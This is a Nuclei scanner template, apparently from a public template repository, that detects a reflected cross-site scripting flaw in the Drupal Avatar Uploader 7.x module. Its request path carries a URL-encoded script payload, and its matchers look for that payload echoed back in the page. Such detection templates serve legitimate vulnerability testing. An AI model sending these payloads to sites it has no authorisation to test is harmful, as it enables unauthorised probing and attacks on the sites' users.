nuclei-templates/http/vulnerabilities/drupal/drupal-avatar-xss.yaml

41 lines
1.1 KiB
YAML
Raw Normal View History

id: drupal-avatar-xss
2022-07-06 17:40:05 +00:00
info:
name: Drupal Avatar Uploader - Cross-Site Scripting
2022-07-06 17:40:05 +00:00
author: bywalks
severity: high
2022-07-06 17:40:05 +00:00
description: |
Drupal Avatar Uploader v7.x-1.0-beta8 plugin contains a cross-site scripting vulnerability in the slider import search feature and tab parameter via plugin settings.
2022-07-06 17:40:05 +00:00
reference:
- https://www.exploit-db.com/exploits/50841
- https://packetstormsecurity.com/files/166409/Drupal-Avatar-Upload-7.x-1.0-beta8-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
tags: xss,drupal,edb,packetstorm
metadata:
max-request: 1
2022-07-06 17:40:05 +00:00
http:
2022-07-06 17:40:05 +00:00
- method: GET
path:
- "{{BaseURL}}/avatar_uploader.pages.inc?file=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<div><script>alert(document.domain)</script></div>"
2022-07-06 17:40:05 +00:00
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200